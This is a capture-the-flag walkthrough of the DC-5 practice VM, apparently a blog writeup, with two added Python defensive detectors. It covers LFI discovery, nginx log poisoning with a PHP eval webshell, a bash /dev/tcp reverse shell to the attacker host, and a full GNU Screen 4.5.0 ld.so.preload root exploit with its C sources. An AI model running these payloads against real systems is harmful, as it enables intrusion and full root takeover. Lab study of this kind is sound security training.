Information Gathering

  • First, check the Kali IP address:
root at kali in ~/DC5 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1573sec preferred_lft 1573sec
inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • An Nmap sweep turns up one target IP: 10.10.8.25
root at kali in ~/DC5 
$ nmap -sn -T4 --min-rate 10000 10.10.8.0/24 -oN Nmap_IP_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:22 CST
Nmap scan report for 10.10.8.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.25
Host is up (0.000069s latency).
MAC Address: 00:0C:29:85:E9:3E (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000060s latency).
MAC Address: 00:50:56:FF:3C:4E (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.68 seconds

Port Scanning

  • Scan for open ports:
root at kali in ~/DC5 
$ nmap -p- -sT -T4 --min-rate 10000 10.10.8.25 -oN Nmap_Port_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:22 CST
Nmap scan report for 10.10.8.25
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
46614/tcp open unknown
MAC Address: 00:0C:29:85:E9:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds

Service Identification

  • Identify the services behind the open ports:
root at kali in ~/DC5 
$ nmap -p80,111,46614 -sV -O -sT -T4 --min-rate 10000 10.10.8.25 -oN Nmap_Server_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:23 CST
Nmap scan report for 10.10.8.25
Host is up (0.00048s latency).

PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
46614/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:85:E9:3E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.62 seconds

Vulnerability Scanning

  • Run Nmap's vuln scripts:
root at kali in ~/DC5 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.25 -oN Nmap_Vuln_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:25 CST
Nmap scan report for 10.10.8.25
Host is up (0.00036s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.25
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.8.25:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind
MAC Address: 00:0C:29:85:E9:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 75.29 seconds
  • I went over the reported findings; none of them is useful.

Directory Scanning

root at kali in ~/DC5 
$ dirsearch -u http://10.10.8.25 -o $PWD/Dirsearch_Dir_Scan.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/DC5/Dirsearch_Dir_Scan.txt

Error Log: /root/.dirsearch/logs/errors-24-06-25_20-27-53.log

Target: http://10.10.8.25/

[20:27:53] Starting:
[20:28:00] 200 - 4KB - /contact.php
[20:28:00] 301 - 184B - /css -> http://10.10.8.25/css/
[20:28:01] 200 - 6KB - /faq.php
[20:28:02] 200 - 17B - /footer.php
[20:28:02] 403 - 570B - /images/
[20:28:02] 301 - 184B - /images -> http://10.10.8.25/images/
[20:28:03] 200 - 4KB - /index.php
[20:28:09] 200 - 852B - /thankyou.php

Task Completed

Exploitation

Information Gathering v2

  • Since the purpose of ports 111 and 46614 is unclear, start by visiting the web service:


  • Nothing special there either; next, look at the directories found by the scan:


  • footer.php is a version/copyright banner file. The same banner appears in thankyou.php and changes in step with footer.php, so thankyou.php evidently includes it; that points to a possible file inclusion vulnerability.

File Inclusion

Note: you may wonder how exactly this was spotted. Think of it like this (personally I find it a stretch, but since this is a practice box, accept it):

<header>xxxx</header>
<body>xxxx</body>
<footer>
<?php
if ($_REQUEST['xxx'] != 'footer.php') {
    include $_REQUEST['xxx'];
} else {
    include 'footer.php';
}
?>
</footer>
  • If it is file inclusion, the parameter name is still unknown; WFuzz or BurpSuite can be used to find it:

WFuzz

  • Test with the following command:
root at kali in ~/DC5 
$ wfuzz -u 'http://10.10.8.25/thankyou.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/wfuzz/general/big.txt > resutl.txt
  • Most responses are 42 lines long (42 L); any response that is not 42 L indicates the parameter we want:
root at kali in ~/DC5 
$ cat resutl.txt | grep -v '42 L'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://10.10.8.25/thankyou.php?FUZZ=/etc/passwd
Total requests: 3024

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001053: 200 70 L 104 W 2319 Ch "file"

Total time: 0
Processed Requests: 3024
Filtered Requests: 0
Requests/sec.: 0
  • The parameter is: file.

BurpSuite

  • Capture and test the request with BurpSuite:


  • This also yields the parameter file.

WebShell

  • Since the target has no SSH port open, the system auth log cannot be used for log inclusion to get a shell, so web server log inclusion is needed instead.
  • On Linux, the Nginx configuration file is usually at /etc/nginx/nginx.conf


  • Including it returns the Nginx configuration; the log locations are:
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
  • Try writing the shell into the log. Remember to send the request with BurpSuite, otherwise an error occurs:
GET /thankyou.php?file=<?php echo 404;eval($_REQUEST[1]);?> HTTP/1.1
Host: 10.10.8.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1



  • Include /var/log/nginx/access.log again; the 404 appearing in the output shows the WebShell was written successfully:


  • Connect with AntSword:


  • Connected. Now check whether the code in thankyou.php matches my guess:
<footer>
<?php
$file = $_GET['file'];
if(isset($file)) {
include("$file");
} else {
include("footer.php");
}
?>
</footer>
  • Close enough; not much difference.
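Added example (not from the original writeup): a Python check a defender could run over nginx's access.log to spot the three stages used above, namely a file parameter outside the allowlist, PHP tags written into the log through the request line or headers, and the poisoned log being included back. The log lines are constructed, not captured from DC-5, and is_allowed_include shows the allowlist a hardened thankyou.php should apply instead of include("$file").

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed nginx access.log sample in the default "combined" format. The requests
# mirror the steps in this writeup, but the lines themselves are made up.
SAMPLE_LOG = """\
10.10.8.17 - - [25/Jun/2024:21:30:05 +0800] "GET /thankyou.php HTTP/1.1" 200 852 "-" "Mozilla/5.0"
10.10.8.17 - - [25/Jun/2024:21:30:12 +0800] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2319 "-" "Wfuzz/3.1.0"
10.10.8.17 - - [25/Jun/2024:21:30:30 +0800] "GET /thankyou.php?file=../../../etc/nginx/nginx.conf HTTP/1.1" 200 1104 "-" "Mozilla/5.0"
10.10.8.17 - - [25/Jun/2024:21:33:05 +0800] "GET /thankyou.php?file=<?php echo 404;eval($_REQUEST[1]);?> HTTP/1.1" 200 852 "-" "Mozilla/5.0"
10.10.8.17 - - [25/Jun/2024:21:35:21 +0800] "GET /thankyou.php?file=/var/log/nginx/access.log HTTP/1.1" 200 40213 "-" "antSword/v2.1"
10.10.8.30 - - [25/Jun/2024:21:36:00 +0800] "GET /faq.php HTTP/1.1" 200 6144 "-" "Mozilla/5.0"
"""
# The request line is matched lazily (.*?) because a poisoned one, like the fourth
# sample line, contains spaces that would break a naive \S+ match on the URI.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>.*?) HTTP/\d\.\d" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
LOG_PATHS = ('/var/log/', '/proc/self/')     # files an attacker poisons, then includes
ALLOWED_INCLUDES = {'footer.php'}            # the only file thankyou.php should include

def is_allowed_include(value):
    """The allowlist check a hardened thankyou.php should apply: a bare, known file
    name only, never a directory component, traversal or absolute path."""
    return value in ALLOWED_INCLUDES and '/' not in value and '..' not in value

def classify(fields):
    """Indicator names found in one parsed log line; [] when it looks clean."""
    findings = []
    uri = unquote(fields['uri'])
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for value in params.get('file', []):
        if PHP_TAG_RE.search(value):
            findings.append('php_tag_in_file_param')  # code being written into the log
        elif value.startswith(LOG_PATHS):
            findings.append('log_file_include')        # poisoned log being executed
        elif not is_allowed_include(value):
            findings.append('lfi_attempt')             # traversal, absolute or unknown path
    # PHP tags can also arrive through headers that nginx copies into the log.
    for field in ('referer', 'ua'):
        if PHP_TAG_RE.search(unquote(fields[field])):
            findings.append('php_tag_in_' + field)
    return findings

def analyze_log(text):
    """(ip, request uri, findings) for every suspicious or unparseable line."""
    report = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            report.append((None, line, ['unparseable']))
        else:
            findings = classify(m.groupdict())
            if findings:
                report.append((m['ip'], m['uri'], findings))
    return report
```

Running analyze_log(SAMPLE_LOG) flags lines two to five and leaves the two ordinary page views alone.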

Host Information Gathering

  • Pop a reverse shell to make running commands easier:
(www-data:/var/www/html) $ bash -c 'exec bash -i &>/dev/tcp/10.10.8.17/4444 <&1'
  • The result:
root at kali in ~/DC5 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.25: inverse host lookup failed: Unknown host
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.25] 42270
bash: cannot set terminal process group (540): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-5:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • Download the lse.sh enumeration script:
root at kali in ~/DC5
$ proxychains curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh
  • Upload lse.sh with AntSword, make it executable and run it:
www-data@dc-5:~/html$ cd /tmp
www-data@dc-5:/tmp$ ls
lse.sh
www-data@dc-5:/tmp$ chmod +x lse.sh
www-data@dc-5:/tmp$ ./lse.sh
---
If you know the current user password, write it here to check sudo privileges:
---

LSE Version: 4.14nw
User: www-data
User ID: 33
Password: none
Home: /var/www
Path: :/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
umask: 0022
......
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/bin/screen-4.5.0
......
  • screen has the SUID bit set; check GTFOBins:


Privilege Escalation

  • GTFOBins lists no SUID technique for it, so fall back to the privilege-escalation enumeration script:
root at kali in ~/DC5
$ proxychains wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
  • Upload les.sh with AntSword, make it executable and run it:
www-data@dc-5:/tmp$ chmod +x les.sh
www-data@dc-5:/tmp$ ./les.sh

Available information:

Kernel version: 3.16.0
Architecture: x86_64
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

dirtycow (failed)

  • Dirty COW looks applicable; give it a try. Download the C file from the web.
  • Check whether the target has GCC:
www-data@dc-5:/tmp$ gcc -v
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.2-10+deb8u2' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=c,c++,java,go,d,fortran,objc,obj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32,m64,mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.2 (Debian 4.9.2-10+deb8u2)
  • Good, it is present. Nice!
  • Upload 40611.c and check how to compile it:
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
  • Compile with the following commands:
echo this is not a test > foo
chmod 0404 foo
gcc -pthread 40611.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
  • After running it, nothing changed. Damn:
www-data@dc-5:/tmp$ ./dirtyc0w foo m00000000000000000
./dirtyc0w foo m00000000000000000
id
mmap 7f68b1d86000

madvise 0

procselfmem 1800000000

www-data@dc-5:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

overlayfs (failed)

  • Try another one:
[+] [CVE-2015-1328] overlayfs

Details: http://seclists.org/oss-sec/2015/q2/717
Exposure: less probable
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Download URL: https://www.exploit-db.com/download/37292
  • Check how to compile it:
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
  • Compile and run with the following commands:
www-data@dc-5:/tmp$ gcc 37292.c -o ofs
www-data@dc-5:/tmp$ ./ofs
spawning threads
failed to create new user namespace
failed to create new mount namespace
child threads done
exploit failed
www-data@dc-5:/tmp$

overlayfs (ovl_setattr) (failed)

  • Still fails; try another:
[+] [CVE-2015-8660] overlayfs (ovl_setattr)

Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Download URL: https://www.exploit-db.com/download/39166
  • Check how to compile it:
/*
just another overlayfs exploit, works on kernels before 2015-12-26

# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660

blah@ubuntu:~$ id
uid=1001(blah) gid=1001(blah) groups=1001(blah)
blah@ubuntu:~$ uname -a && cat /etc/issue
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
blah@ubuntu:~$ ./overlayfail
root@ubuntu:~# id
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)

12/2015
by rebel

6354b4e23db225b565d79f226f2e49ec0fe1e19b
*/
  • Compile and run with the following commands:
www-data@dc-5:/tmp$ gcc 39166.c -o 39166
www-data@dc-5:/tmp$ ./39166
failed to create new user namespace
failed to create new mount namespace
couldn't create suid :(
  • I tried about 4 or 5 of them and none worked, so back to where we started: take a look at the SUID screen binary.

screen Privilege Escalation

  • Since GTFOBins has nothing, check whether searchsploit has a matching entry:
# /bin/screen-4.5.0
root at kali in ~/DC5
$ searchsploit screen 4.5.0


  • There is a 41154.sh file; upload it straight to the target and try running it:
# Move to the current directory
root at kali in ~/DC5
$ searchsploit -m linux/local/41154.sh
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/DC5/41154.sh

# On the target, make it executable and run it
www-data@dc-5:/tmp$ chmod +x 41154.sh
www-data@dc-5:/tmp$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Note: in other bloggers' writeups, it seems nobody ran this script directly; they split it into separate files and compiled those.

  • Find the flag:
cd /root
ls
thisistheflag.txt
cat th*

888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888

Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

screen Supplement

  • Since most writeups compile the pieces separately, I will try that too. First, look at the contents of 41154.sh:

Note: if 41154.sh was already run earlier, compiling rootshell.c will fail; the target VM needs to be re-imported.

root at kali in ~/DC5 
$ cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
  • The script can be split into three parts:

libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}

rootshell.c

#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}

run.sh

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
  • Upload all three files to the target and run the following commands in order:
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
chmod +x run.sh
./run.sh
  • The result:
www-data@dc-5:/tmp$ ./run.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
  • This also escalates to root.
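Added example (not from the original writeup): a Python audit for the two host conditions the screen technique above relies on and that lse.sh reported, namely a setuid binary outside the expected baseline (/bin/screen-4.5.0) and an /etc/ld.so.preload that exists, is not root-only, or names a library outside the system library paths (the script writes /tmp/libhax.so there). BASELINE_SETUID is a constructed placeholder set, not an authoritative Debian 8 list.

```python
import os
import stat

# Constructed baseline of setuid binaries expected on a stock Debian 8 host; in
# practice this set is generated from a known-good image, not typed by hand.
BASELINE_SETUID = {'/bin/su', '/bin/mount', '/bin/umount', '/usr/bin/passwd', '/usr/bin/sudo'}
# Libraries listed in ld.so.preload should only ever live under system library paths.
SYSTEM_LIB_DIRS = ('/lib/', '/lib64/', '/usr/lib/', '/usr/lib64/')

def audit_preload(preload_path='/etc/ld.so.preload'):
    """Findings for ld.so.preload: present at all, writable by non-root, or naming
    a library outside the system directories (e.g. /tmp/libhax.so)."""
    findings = []
    if not os.path.exists(preload_path):
        return findings            # the normal state: no preload file at all
    findings.append('preload_file_present')
    st = os.stat(preload_path)
    if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append('preload_not_root_only')
    with open(preload_path) as fh:
        for entry in fh.read().split():   # one library path per line, blanks ignored
            if not entry.startswith(SYSTEM_LIB_DIRS):
                findings.append('untrusted_library:' + entry)
    return findings

def find_setuid(roots):
    """Regular files with the setuid or setgid bit under the given directories."""
    found = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)    # do not follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    found.add(path)
    return found

def unexpected_setuid(roots, baseline=BASELINE_SETUID):
    """Setuid/setgid binaries not in the baseline, such as a stray /bin/screen-4.5.0."""
    return sorted(find_setuid(roots) - baseline)

if __name__ == '__main__':
    print(audit_preload())
    print(unexpected_setuid(['/bin', '/sbin', '/usr/bin', '/usr/sbin']))
```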